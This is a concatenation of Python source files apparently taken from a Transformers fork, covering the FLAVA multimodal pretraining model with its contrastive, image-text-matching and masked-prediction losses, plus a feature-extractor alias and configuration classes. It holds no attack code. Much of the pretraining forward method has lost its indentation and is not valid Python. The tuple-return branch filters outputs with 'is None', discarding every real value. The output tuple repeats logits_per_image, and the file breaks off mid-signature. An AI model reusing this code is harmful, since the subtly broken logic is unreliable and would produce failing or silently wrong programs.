        self.bias = nn.Parameter(torch.zeros(config.vocab_size))
        if weight is not None:
            # Optionally tie the decoder to an externally supplied embedding matrix.
            self.decoder.weight = weight
        # Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
        self.decoder.bias = self.bias

    def forward(self, x):
        return self.decoder(self.transform(x))
class FlavaITMHead(nn.Module):
    """Image-text matching head: pool the multimodal sequence, then classify match vs. no-match."""

    def __init__(self, config):
        super().__init__()
        self.config = config
        self.pooler = FlavaPooler(config)
        # Two logits: (no-match, match).
        self.seq_relationship = nn.Linear(config.hidden_size, 2)

    def forward(self, x):
        return self.seq_relationship(self.pooler(x))
class FlavaGlobalContrastiveHead(nn.Module):
    """
    Computes global (cross-worker) contrastive logits between image and text embeddings.

    In a distributed run, each worker's local embeddings are scored against embeddings gathered
    from every worker; otherwise only the local batch is used.
    """

    def __init__(self, config):
        super().__init__()
        self.config = config
        # When True, the gathered embeddings keep gradients flowing back to all workers.
        self.global_backprop_contrastive = config.global_backprop_contrastive

    def forward(self, image_embeddings, text_embeddings, logit_scale):
        """
        Args:
            image_embeddings: `(local_batch, dim)` projected image embeddings.
            text_embeddings: `(local_batch, dim)` projected text embeddings.
            logit_scale: scalar tensor; logits are scaled by `exp(logit_scale)`.

        Returns:
            `(logits_per_image, logits_per_text, labels)` — logits of shape
            `(local_batch, global_batch)` and the index of each row's positive pair.
        """
        temperature = torch.exp(logit_scale)
        if not torch.distributed.is_available() or not torch.distributed.is_initialized():
            # Single-process case: the "global" batch is just the local batch.
            labels = torch.arange(image_embeddings.size(0), device=image_embeddings.device)
            image_embeddings_all = [image_embeddings]
            text_embeddings_all = [text_embeddings]
        else:
            local_batch_size = image_embeddings.size(0)
            world_size = torch.distributed.get_world_size()

            if self.global_backprop_contrastive:
                # Fix: `all_gather_with_backprop` does not exist in PyTorch; the differentiable
                # gather (backprops to all workers) is `torch.distributed.nn.functional.all_gather`.
                image_embeddings_all = torch.distributed.nn.functional.all_gather(image_embeddings)
                text_embeddings_all = torch.distributed.nn.functional.all_gather(text_embeddings)
            else:
                # Plain all_gather: gathered copies carry no gradient; buffers must match the
                # gathered tensor's shape (previously the image/text zeros_like calls were swapped).
                image_embeddings_all = [torch.zeros_like(image_embeddings) for _ in range(world_size)]
                text_embeddings_all = [torch.zeros_like(text_embeddings) for _ in range(world_size)]
                torch.distributed.all_gather(image_embeddings_all, image_embeddings)
                torch.distributed.all_gather(text_embeddings_all, text_embeddings)

            # This worker's positives sit at offset rank * local_batch_size in the global batch.
            labels = local_batch_size * torch.distributed.get_rank() + torch.arange(
                local_batch_size, device=image_embeddings.device
            )

        image_embeddings_all = torch.cat(image_embeddings_all)
        text_embeddings_all = torch.cat(text_embeddings_all)

        logits_per_image = torch.matmul(image_embeddings, text_embeddings_all.transpose(0, 1)) * temperature
        logits_per_text = torch.matmul(text_embeddings, image_embeddings_all.transpose(0, 1)) * temperature

        return logits_per_image, logits_per_text, labels
@add_start_docstrings(
"""
The FLAVA model for pretraining which outputs losses, embeddings, logits and transformer outputs.
""",
FLAVA_START_DOCSTRING.format(config="FlavaConfig") + FLAVA_PRETRAINING_START_DOCSTRING_EXTRA,
)
class FlavaForPreTraining(FlavaPreTrainedModel):
# Those are linked to xxx.bias
_keys_to_ignore_on_load_missing = [
"mmm_text_head.decoder.bias",
"mmm_image_head.decoder.bias",
"mlm_head.decoder.bias",
"mim_head.decoder.bias",
]
    def __init__(self, config: FlavaConfig, image_codebook: Optional[nn.Module] = None):
        """
        Args:
            config: Global FLAVA config holding the text/image/multimodal sub-configs and the
                per-task loss weights.
            image_codebook: Optional pre-built codebook module; when `None` and
                `config.init_codebook` is set, a `FlavaImageCodebook` is created from
                `config.image_codebook_config`.
        """
        super().__init__(config)
        self.flava = FlavaModel(config)
        self.image_codebook = image_codebook
        if self.image_codebook is None and config.init_codebook:
            self.image_codebook = FlavaImageCodebook(config.image_codebook_config)
        # Leverage the text and image encoder configs to create the masked
        # prediction heads, since each carries the right vocab size.
        self.mim_head = FlavaMaskedPredictionHead(config.image_config)
        self.mlm_head = FlavaMaskedPredictionHead(config.text_config)
        self.itm_head = FlavaITMHead(config)
        self.mmm_image_head = FlavaMaskedPredictionHead(config.image_config)
        self.mmm_text_head = FlavaMaskedPredictionHead(config.text_config)
        self.global_contrastive_head = FlavaGlobalContrastiveHead(config)
        # Vocab sizes used when reshaping masked-prediction logits for the losses.
        self.image_vocab_size = config.image_config.vocab_size
        self.text_vocab_size = config.text_config.vocab_size
        # Per-task loss weights and CE ignore index.
        self.mlm_weight = config.mlm_weight
        self.mim_weight = config.mim_weight
        self.global_contrastive_weight = config.global_contrastive_weight
        self.ce_ignore_index = config.ce_ignore_index
        self.itm_weight = config.itm_weight
        self.mmm_image_weight = config.mmm_image_weight
        self.mmm_text_weight = config.mmm_text_weight
        self.skip_unmasked_multimodal_encoder = config.skip_unmasked_multimodal_encoder
        # Initialize weights and apply final processing.
        self.post_init()
def _resize_to_2d(self, x: torch.Tensor):
if x.dim() > 2:
x = x.view(x.size(0), -1)
return x
@add_start_docstrings_to_model_forward(
FLAVA_PRETRAINING_INPUTS_DOCSTRING.format("batch_size, text_seq_len", "batch_size, image_num_patches")
)
@replace_return_docstrings(output_type=FlavaForPreTrainingOutput, config_class=FlavaConfig)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
input_ids_masked: Optional[torch.LongTensor] = None,
pixel_values: Optional[torch.FloatTensor] = None,
codebook_pixel_values: Optional[torch.FloatTensor] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
bool_masked_pos: Optional[torch.Tensor] = None,
position_ids: Optional[torch.LongTensor] = None,
image_attention_mask: Optional[torch.Tensor] = None,
skip_unmasked_multimodal_encoder: bool = None,
mlm_labels: Optional[torch.Tensor] = None,
mim_labels: Optional[torch.Tensor] = None,
itm_labels: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: bool = True,
return_dict: Optional[bool] = None,
return_loss: Optional[bool] = None,
) -> Union[Tuple[torch.Tensor], FlavaForPreTrainingOutput]:
"""
Examples:
```python
>>> from PIL import Image
>>> import requests
>>> from transformers import FlavaForPreTraining, AutoProcessor
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> model = FlavaForPreTraining.from_pretrained("facebook/flava-full")
>>> processor = AutoProcessor.from_pretrained("facebook/flava-full")
>>> text = ["a photo of a cat"]
>>> inputs = processor(
... images=[image],
... text=text,
... return_masks=True,
... return_codebook_pixels=True,
... padding=True,
... max_length=77,
... return_tensors="pt",
... )
>>> output = model(**inputs)
```
Return:
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
return_loss = return_loss if return_loss is not None else self.config.return_loss
skip_unmasked_multimodal_encoder = (
skip_unmasked_multimodal_encoder
if skip_unmasked_multimodal_encoder is not None
else self.skip_unmasked_multimodal_encoder
)
if input_ids_masked is None and input_ids is not None:
logger.warning(
"`input_ids_masked` isn't passed which means MLM loss won't be calculated correctlySetting it to"
" `input_ids` so that model can work. Please pass it if this is unintentional. This is usually OKAY if"
" you are doing inference on unmasked text..."
)
input_ids_masked = input_ids
flava_output = self.flava(
input_ids=input_ids,
pixel_values=pixel_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
image_attention_mask=image_attention_mask,
# Don't need unmasked multimodal embedding for anything so skip it
# NOTE: ITM uses masked version
skip_multimodal_encoder=skip_unmasked_multimodal_encoder,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
# Pass true to have deterministic outputs
return_dict=True,
)
flava_masked_output = self.flava(
input_ids=input_ids_masked,
pixel_values=pixel_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
image_attention_mask=image_attention_mask,
bool_masked_pos=bool_masked_pos,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=True,
)
pos_mask = None
image_embeddings = flava_output.image_embeddings
text_embeddings = flava_output.text_embeddings
image_masked_embeddings = flava_masked_output.image_embeddings
text_masked_embeddings = flava_masked_output.text_embeddings
multimodal_masked_embeddings = flava_masked_output.multimodal_embeddings
total_loss = mim_loss = mlm_loss = mmm_text_loss = mmm_image_loss = gc_loss = itm_loss = None
mim_logits = mlm_logits = mmm_text_logits = mmm_image_logits = None
itm_logits = logits_per_image = logits_per_text = None
# Calculate mim_labels if necessary from the image_codebook
if image_masked_embeddings is not None or multimodal_masked_embeddings is not None:
if mim_labels is None and return_loss:
if self.image_codebook is None:
raise RuntimeError(
"`return_loss` is set to True but the image codebook is not initialized and no `mim_labels` "
" have been passed. Reinstantiate the model with `init_codebook` set to True or "
"pass in your custom `mim_labels`"
)
if codebook_pixel_values is None:
raise ValueError(
"`codebook_pixel_value` are required to generate `mim_labels` if loss is expected. "
"Call `AutoProcessor` with `return_codebook_pixels` set to True"
)
mim_labels = self.image_codebook.get_codebook_indices(codebook_pixel_values)
# Unimodal MIM Loss
# If multimodal embeddings are present, we will calculate MMM loss
if self.mim_weight > 0 and image_masked_embeddings is not None and multimodal_masked_embeddings is None:
sequence_for_image = image_masked_embeddings
if mim_labels is not None:
mim_labels = self._resize_to_2d(mim_labels)
bool_masked_pos = self._resize_to_2d(bool_masked_pos)
mim_labels[bool_masked_pos.ne(True)] = self.ce_ignore_index
sequence_for_image = sequence_for_image[:, -mim_labels.size(1) :, :]
masked_tokens = mim_labels.ne(self.ce_ignore_index)
mim_labels_filtered = mim_labels[masked_tokens]
sequence_for_image = sequence_for_image[masked_tokens, :]
mim_logits = self.mim_head(sequence_for_image)
if return_loss:
mim_loss = nn.functional.cross_entropy(
mim_logits.view(-1, self.image_vocab_size), mim_labels_filtered.view(-1)
)
mim_loss *= self.mim_weight
else:
mim_logits = self.mim_head(sequence_for_image)
# Unimodal MLM Loss
if self.mlm_weight > 0 and text_masked_embeddings is not None and multimodal_masked_embeddings is None:
sequence_for_text = text_masked_embeddings
if mlm_labels is not None:
mlm_labels = self._resize_to_2d(mlm_labels)
sequence_for_text = sequence_for_text[:, -mlm_labels.size(1) :, :]
masked_tokens = mlm_labels.ne(self.ce_ignore_index)
mlm_labels_filtered = mlm_labels[masked_tokens]
sequence_for_text = sequence_for_text[masked_tokens, :]
mlm_logits = self.mlm_head(sequence_for_text)
if return_loss:
mlm_loss = nn.functional.cross_entropy(
mlm_logits.view(-1, self.text_vocab_size), mlm_labels_filtered.view(-1)
)
mlm_loss *= self.mlm_weight
else:
mlm_logits = self.mlm_head(sequence_for_text)
# ITM Loss
if self.itm_weight > 0 and multimodal_masked_embeddings is not None:
itm_logits = self.itm_head(multimodal_masked_embeddings)
if itm_labels is not None:
pos_pairs = itm_labels.ne(0)
pos_mask = torch.where(pos_pairs.any(), pos_pairs, pos_pairs.new([True]))
if return_loss:
itm_loss = nn.functional.cross_entropy(itm_logits, itm_labels)
itm_loss *= self.itm_weight
if multimodal_masked_embeddings is not None:
multimodal_masked_embeddings = multimodal_masked_embeddings[pos_mask]
if mlm_labels is not None:
mlm_labels = mlm_labels[pos_mask]
if mim_labels is not None:
mim_labels = mim_labels[pos_mask]
# MMM Image Loss
if multimodal_masked_embeddings is not None and self.mmm_image_weight > 0:
sequence_for_image = multimodal_masked_embeddings
end_index = image_masked_embeddings.size(1) - 1
sequence_for_image = sequence_for_image[:, 2 : 2 + end_index, :]
if pos_mask is not None:
sequence_for_image = sequence_for_image[pos_mask]
if mim_labels is not None:
mim_labels = self._resize_to_2d(mim_labels)
bool_masked_pos = self._resize_to_2d(bool_masked_pos)
mim_labels[bool_masked_pos.ne(True)] = self.ce_ignore_index
masked_tokens = mim_labels.ne(self.ce_ignore_index)
mim_labels_filtered = mim_labels[masked_tokens]
sequence_for_image = sequence_for_image[masked_tokens, :]
mmm_image_logits = self.mmm_image_head(sequence_for_image)
if return_loss:
mmm_image_loss = nn.functional.cross_entropy(
mmm_image_logits.view(-1, self.image_vocab_size), mim_labels_filtered.view(-1)
)
mmm_image_loss *= self.mmm_image_weight
else:
mmm_image_logits = self.mmm_image_head(sequence_for_image)
# MMM Text Loss
if multimodal_masked_embeddings is not None and self.mmm_text_weight > 0:
sequence_for_text = multimodal_masked_embeddings
sequence_for_text = sequence_for_text[:, -text_masked_embeddings.size(1) :, :]
if pos_mask is not None:
sequence_for_text = sequence_for_text[pos_mask]
if mlm_labels is not None:
mlm_labels = self._resize_to_2d(mlm_labels)
masked_tokens = mlm_labels.ne(self.ce_ignore_index)
mlm_labels_filtered = mlm_labels[masked_tokens]
sequence_for_text = sequence_for_text[masked_tokens, :]
mmm_text_logits = self.mmm_text_head(sequence_for_text)
if return_loss:
mmm_text_loss = nn.functional.cross_entropy(
mmm_text_logits.view(-1, self.text_vocab_size), mlm_labels_filtered.view(-1)
)
mmm_text_loss *= self.mmm_text_weight
else:
mmm_text_logits = self.mmm_text_head(sequence_for_text)
# Global Contrastive Loss
if image_embeddings is not None and text_embeddings is not None and self.global_contrastive_weight > 0:
text_embedding = self.flava.text_projection(text_embeddings[:, 0, :])
text_embedding = nn.functional.normalize(text_embedding, dim=-1)
image_embedding = self.flava.image_projection(image_embeddings[:, 0, :])
image_embedding = nn.functional.normalize(image_embedding, dim=-1)
self.flava.logit_scale.data.clamp_(LOGIT_SCALE_CLAMP_MIN, LOGIT_SCALE_CLAMP_MAX)
logits_per_image, logits_per_text, gc_labels = self.global_contrastive_head(
image_embedding, text_embedding, self.flava.logit_scale
)
# Apply ITM negative mask if any
if pos_mask is not None:
logits_per_image = logits_per_image[pos_mask]
logits_per_text = logits_per_text[pos_mask]
gc_labels = gc_labels[pos_mask]
if return_loss:
gc_loss_image = nn.functional.cross_entropy(logits_per_image, gc_labels)
gc_loss_text = nn.functional.cross_entropy(logits_per_text, gc_labels)
gc_loss = (gc_loss_image + gc_loss_text) / 2
gc_loss *= self.global_contrastive_weight
flava_losses = FlavaLosses(
mim=mim_loss,
mlm=mlm_loss,
itm=itm_loss,
global_contrastive=gc_loss,
mmm_image=mmm_image_loss,
mmm_text=mmm_text_loss,
)
if return_loss and not flava_losses.all_none():
total_loss = sum(loss if loss is not None else 0 for loss in flava_losses.values())
if not return_dict:
output = (
image_embeddings,
flava_output.image_output.to_tuple() if flava_output.image_output is not None else None,
text_embeddings,
flava_output.text_output.to_tuple() if flava_output.text_output is not None else None,
flava_output.multimodal_embeddings,
flava_output.multimodal_output.to_tuple() if flava_output.multimodal_output is not None else None,
image_masked_embeddings,
flava_masked_output.image_output.to_tuple() if flava_masked_output.image_output is not None else None,
text_masked_embeddings,
flava_masked_output.text_output.to_tuple() if flava_masked_output.text_output is not None else None,
multimodal_masked_embeddings,
flava_masked_output.multimodal_output.to_tuple()
if flava_masked_output.multimodal_output is not None
else None,
mim_logits,
mlm_logits,
itm_logits,
logits_per_image,
logits_per_image,
mmm_image_logits,
mmm_text_logits,
)
if return_loss and not flava_losses.all_none():
output = (
total_loss,
flava_losses,
) + output
# Filter None as transformer by default won't handle it
return tuple(x for x in output if x is None)
return FlavaForPreTrainingOutput(
loss=total_loss,
loss_info=flava_losses,
image_embeddings=image_embeddings,
image_output=flava_output.image_output,
text_embeddings=text_embeddings,
text_output=flava_output.text_output,
multimodal_embeddings=flava_output.multimodal_embeddings,
multimodal_output=flava_output.multimodal_output,
image_masked_embeddings=image_masked_embeddings,
image_masked_output=flava_masked_output.image_output,
text_masked_embeddings=text_masked_embeddings,
text_masked_output=flava_masked_output.text_output,
multimodal_masked_embeddings=multimodal_masked_embeddings,
multimodal_masked_output=flava_masked_output.multimodal_output,
mim_logits=mim_logits,
mlm_logits=mlm_logits,
itm_logits=itm_logits,
contrastive_logits_per_image=logits_per_image,
contrastive_logits_per_text=logits_per_text,
mmm_image_logits=mmm_image_logits,
mmm_text_logits=mmm_text_logits,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,201 | src/transformers/models/flava/feature_extraction_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for FLAVA."""
import warnings
from ...utils import logging
from .image_processing_flava import FlavaImageProcessor
logger = logging.get_logger(__name__)
class FlavaFeatureExtractor(FlavaImageProcessor):
    """Deprecated alias of [`FlavaImageProcessor`].

    Kept only for backward compatibility: instantiating it emits a `FutureWarning`
    and otherwise behaves exactly like `FlavaImageProcessor`.
    """

    def __init__(self, *args, **kwargs) -> None:
        deprecation_message = (
            "The class FlavaFeatureExtractor is deprecated and will be removed in version 5 of Transformers. Please"
            " use FlavaImageProcessor instead."
        )
        warnings.warn(deprecation_message, FutureWarning)
        super().__init__(*args, **kwargs)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 30,831 | src/transformers/models/flava/configuration_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" FLAVA model configurations"""
import copy
import os
from typing import Any, Dict, Union
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
# Maps canonical FLAVA checkpoint names to the URLs of their hosted config files.
FLAVA_PRETRAINED_CONFIG_ARCHIVE_MAP = {
    "facebook/flava-full": "https://huggingface.co/facebook/flava-full/resolve/main/config.json",
}
class FlavaImageConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`FlavaImageModel`]. It is used to instantiate an
    FLAVA model according to the specified arguments, defining the model architecture.

    Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
    [facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        hidden_size (`int`, *optional*, defaults to 768):
            Dimensionality of the encoder layers and the pooler layer.
        num_hidden_layers (`int`, *optional*, defaults to 12):
            Number of hidden layers in the Transformer encoder.
        num_attention_heads (`int`, *optional*, defaults to 12):
            Number of attention heads for each attention layer in the Transformer encoder.
        intermediate_size (`int`, *optional*, defaults to 3072):
            Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
        hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
            The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
            `"relu"`, `"selu"` and `"gelu_new"` are supported.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout ratio for the attention probabilities.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.
        image_size (`int`, *optional*, defaults to 224):
            The size (resolution) of each image.
        patch_size (`int`, *optional*, defaults to 16):
            The size (resolution) of each patch.
        num_channels (`int`, *optional*, defaults to 3):
            The number of input channels.
        qkv_bias (`bool`, *optional*, defaults to `True`):
            Whether to add a bias to the queries, keys and values.
        mask_token (`bool`, *optional*, defaults to `True`):
            Whether to use a mask token or not. Used in MIM (Masked Image Modeling) loss for FLAVA.
        vocab_size (`int`, *optional*, defaults to 8192):
            Vocabulary size of the [`FlavaImageCodebook`] used in conjunction with [`FlavaImageModel`] for MIM (Masked
            Image Modeling) loss for FLAVA.

    Example:

    ```python
    >>> from transformers import FlavaImageConfig, FlavaImageModel

    >>> # Initializing a FlavaImageModel with  style configuration
    >>> configuration = FlavaImageConfig()

    >>> # Initializing a FlavaImageModel model (with random weights) from the style configuration
    >>> model = FlavaImageModel(configuration)

    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""

    model_type = "flava_image_model"

    def __init__(
        self,
        hidden_size: int = 768,
        num_hidden_layers: int = 12,
        num_attention_heads: int = 12,
        intermediate_size: int = 3072,
        hidden_act: str = "gelu",  # annotation fixed: the value is an activation *name*, not an int
        hidden_dropout_prob: float = 0.0,
        attention_probs_dropout_prob: float = 0.0,
        initializer_range: float = 0.02,
        layer_norm_eps: float = 1e-12,
        image_size: int = 224,
        patch_size: int = 16,
        num_channels: int = 3,
        qkv_bias: bool = True,
        mask_token: bool = True,
        vocab_size: int = 8192,
        **kwargs,
    ):
        super().__init__(**kwargs)

        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.initializer_range = initializer_range
        self.layer_norm_eps = layer_norm_eps
        self.image_size = image_size
        self.patch_size = patch_size
        self.num_channels = num_channels
        self.qkv_bias = qkv_bias
        self.mask_token = mask_token
        self.vocab_size = vocab_size

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
        """Load this config from a checkpoint, unwrapping the `image_config` key when the
        checkpoint holds a composite `FlavaConfig`."""
        config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)

        # get the image config dict if we are loading from FlavaConfig
        if config_dict.get("model_type") == "flava":
            config_dict = config_dict["image_config"]

        if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
            logger.warning(
                f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
                f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
            )

        return cls.from_dict(config_dict, **kwargs)
class FlavaTextConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`FlavaTextModel`]. It is used to instantiate an
    FLAVA model according to the specified arguments, defining the model architecture.

    Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
    [facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        vocab_size (`int`, *optional*, defaults to 30522):
            Vocabulary size of the BERT model. Defines the number of different tokens that can be represented by the
            `inputs_ids` passed when calling [`FlavaTextModel`].
        type_vocab_size (`int`, *optional*, defaults to 2):
            The vocabulary size of the `token_type_ids` passed when calling [`FlavaTextModel`]. Note that even though
            text encoder allows `token_type_ids`'s value as 2, for text-only pretraining and fine-tuning, only 1 is
            used similar to RoBERTa.
        max_position_embeddings (`int`, *optional*, defaults to 512):
            The maximum sequence length that this model might ever be used with. Typically set this to something large
            just in case (e.g., 512 or 1024 or 2048). For VL, max_length passed to model is 77.
        position_embedding_type (`str`, *optional*, defaults to `"absolute"`):
            Type of position embedding. Choose one of `"absolute"`, `"relative_key"`, `"relative_key_query"`. For
            positional embeddings use `"absolute"`. For more information on `"relative_key"`, please refer to
            [Self-Attention with Relative Position Representations (Shaw et al.)](https://arxiv.org/abs/1803.02155).
            For more information on `"relative_key_query"`, please refer to *Method 4* in [Improve Transformer Models
            with Better Relative Position Embeddings (Huang et al.)](https://arxiv.org/abs/2009.13658).
        hidden_size (`int`, *optional*, defaults to 768):
            Dimensionality of the encoder layers and the pooler layer.
        num_hidden_layers (`int`, *optional*, defaults to 12):
            Number of hidden layers in the Transformer encoder.
        num_attention_heads (`int`, *optional*, defaults to 12):
            Number of attention heads for each attention layer in the Transformer encoder.
        intermediate_size (`int`, *optional*, defaults to 3072):
            Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
        hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
            The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
            `"relu"`, `"selu"` and `"gelu_new"` are supported.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout ratio for the attention probabilities.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.
        pad_token_id (`int`, *optional*, defaults to 0):
            The id of the token used for padding text sequences.
        qkv_bias (`bool`, *optional*, defaults to `True`):
            Whether to add a bias to the queries, keys and values.

    Example:

    ```python
    >>> from transformers import FlavaTextConfig, FlavaTextModel

    >>> # Initializing a FlavaTextModel with  style configuration
    >>> configuration = FlavaTextConfig()

    >>> # Initializing a FlavaTextModel model (with random weights) from the style configuration
    >>> model = FlavaTextModel(configuration)

    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""

    model_type = "flava_text_model"

    def __init__(
        self,
        vocab_size: int = 30522,
        type_vocab_size: int = 2,
        max_position_embeddings: int = 512,
        position_embedding_type: str = "absolute",
        hidden_size: int = 768,
        num_hidden_layers: int = 12,
        num_attention_heads: int = 12,
        intermediate_size: int = 3072,
        hidden_act: str = "gelu",
        hidden_dropout_prob: float = 0.0,
        attention_probs_dropout_prob: float = 0.0,
        initializer_range: float = 0.02,
        layer_norm_eps: float = 1e-12,
        pad_token_id: int = 0,
        qkv_bias: bool = True,
        **kwargs,
    ):
        super().__init__(**kwargs)

        self.vocab_size = vocab_size
        self.type_vocab_size = type_vocab_size
        self.max_position_embeddings = max_position_embeddings
        self.position_embedding_type = position_embedding_type
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.initializer_range = initializer_range
        self.layer_norm_eps = layer_norm_eps
        self.qkv_bias = qkv_bias
        self.pad_token_id = pad_token_id

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
        """Load this config from a checkpoint, unwrapping the `text_config` key when the
        checkpoint holds a composite `FlavaConfig`."""
        config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)

        # get the text config dict if we are loading from FlavaConfig
        if config_dict.get("model_type") == "flava":
            config_dict = config_dict["text_config"]

        if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
            logger.warning(
                f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
                f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
            )

        return cls.from_dict(config_dict, **kwargs)
class FlavaMultimodalConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`FlavaMultimodalModel`]. It is used to instantiate
    an FLAVA model according to the specified arguments, defining the model architecture.

    Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
    [facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        hidden_size (`int`, *optional*, defaults to 768):
            Dimensionality of the encoder layers and the pooler layer.
        num_hidden_layers (`int`, *optional*, defaults to 6):
            Number of hidden layers in the Transformer encoder.
        num_attention_heads (`int`, *optional*, defaults to 12):
            Number of attention heads for each attention layer in the Transformer encoder.
        intermediate_size (`int`, *optional*, defaults to 3072):
            Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
        hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
            The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
            `"relu"`, `"selu"` and `"gelu_new"` are supported.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout ratio for the attention probabilities.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.
        qkv_bias (`bool`, *optional*, defaults to `True`):
            Whether to add a bias to the queries, keys and values.
        use_cls_token (`bool`, *optional*, defaults to `True`):
            Whether to use an extra CLS token for multimodal settings. Usually needed by the FLAVA model.

    Example:

    ```python
    >>> from transformers import FlavaMultimodalConfig, FlavaMultimodalModel

    >>> # Initializing a FlavaMultimodalModel with  style configuration
    >>> configuration = FlavaMultimodalConfig()

    >>> # Initializing a FlavaMultimodalModel model (with random weights) from the style configuration
    >>> model = FlavaMultimodalModel(configuration)

    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""

    model_type = "flava_multimodal_model"

    def __init__(
        self,
        hidden_size: int = 768,
        num_hidden_layers: int = 6,
        num_attention_heads: int = 12,
        intermediate_size: int = 3072,
        hidden_act: str = "gelu",  # annotation fixed: activation name, not an int
        hidden_dropout_prob: float = 0.0,  # annotation fixed: dropout probability is a float
        attention_probs_dropout_prob: float = 0.0,  # annotation fixed: dropout probability is a float
        initializer_range: float = 0.02,
        layer_norm_eps: float = 1e-12,
        qkv_bias: bool = True,
